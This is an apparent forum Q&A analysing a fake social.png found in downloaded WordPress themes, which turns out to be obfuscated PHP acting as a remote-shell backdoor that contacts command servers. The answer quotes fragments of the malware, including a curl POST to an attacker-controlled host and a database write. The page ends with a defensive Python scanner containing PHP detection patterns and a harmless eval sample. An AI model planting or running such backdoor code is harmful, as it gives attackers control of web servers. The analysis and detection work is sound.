What is the purpose of the strange fake social.png in many WordPress themes


Problem description

I have downloaded some WordPress themes from a website and I have noticed a strange include of a social.png file. Looking at this file, it is not a real PNG file but a PHP script that contains hard-to-understand obfuscated code, and the same is true for many WordPress plugins distributed from other sites.

The file size is 45 kB and it has this hash: 3FFC93695CA3C919F36D52D07BDB5B198E7C6D63

Does anyone have an idea of the function of this file?

This is the file

Recommended answer

According to this forum post:

Basically, it is a remote shell callback that uses public key encryption to only allow the hacker to run code on your server. It generates a per-install RSA key pair, uploads it to the command server (which it has a pre-seeded list of, but can dynamically update from other infected hosts to avoid being shut down) using an embedded key, and also sends through a list of capabilities (eval/exec enabled, server information) and emails it to a list of email addresses found in the file.

It's using WordPress's config system to store its data, so have a look in your database for a setting key called WP_CLIENT_KEY, which will look like a bunch of garbled text.

Once active, the exploit will take a list of commands to eval on the server - probably more shells or exploits - and also inject strings into the page footer. These strings are probably blackhat SEO spam, but it also injects a list of command and control servers that it is in contact with as well - so any other infected sites will be using your server to find others.

As I noted in the comments, the script will update and store data in the WP database:

$AKorMlJxhsFuVmuppepc->setQuery("INSERT INTO #__options(option_name, value) values ('{$zgWyMIVCeKwSmjusORA}' , '{$ytnxJjQqCvGdNRBKCigc}')");
...

Which, as the forum post pointed out, is for the script's own access. The script also sends data, presumably the public key, to a specified server through a shell POST request:

curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_URL, "http://$gXNjWLFkUQOugyREMXKv");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, true);
if (isset($WbKPQMoSbMZkXUeYKXRI)) {
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRI);
}

Regardless of the exact purpose of the script, you should delete all references to it and attempt to rid yourself of the script completely.
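As an added defender-side example (not part of the question or the quoted answer), the following Python scanner walks a theme or plugin tree and flags image-named files that lack a real image signature but carry PHP markers, which is exactly the shape of the fake social.png described above; the marker list and the sample tree are constructed assumptions.

```python
# Added defender-side example, not code from the question or answer. The
# PHP marker list below is an assumption, not an exhaustive signature set.
import os
import re
import tempfile

# Real image files start with these signatures; anything else is suspect.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# eval and curl_setopt appear in the snippets quoted in the answer.
PHP_MARKERS = re.compile(rb"<\?php|\beval\s*\(|base64_decode\s*\(|curl_setopt\s*\(")

def classify_image_file(path):
    """Return None for a plausible image, else a short reason string."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in MAGIC:
        return None
    with open(path, "rb") as fh:
        data = fh.read()
    if any(data.startswith(sig) for sig in MAGIC[ext]):
        return None
    hit = PHP_MARKERS.search(data)
    if hit:
        return "php_in_image:" + hit.group(0).decode("ascii", "replace")
    return "bad_image_signature"

def scan_tree(root):
    """Walk a theme/plugin directory; map relative path -> reason for each hit."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reason = classify_image_file(full)
            if reason:
                findings[os.path.relpath(full, root)] = reason
    return findings

def demo():
    """Constructed theme tree: one genuine PNG header, one PHP file named .png."""
    root = tempfile.mkdtemp(prefix="wp-theme-")
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "images", "logo.png"), "wb") as fh:
        fh.write(MAGIC[".png"][0] + b"\x00" * 16)
    with open(os.path.join(root, "images", "social.png"), "wb") as fh:
        fh.write(b"<?php $c = 'x'; @eval($c); ?>")
    return scan_tree(root)
```

Point scan_tree at wp-content/themes or wp-content/plugins to get a list of image-named files worth opening in a text editor; a bad_image_signature result without PHP markers still deserves a manual look.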
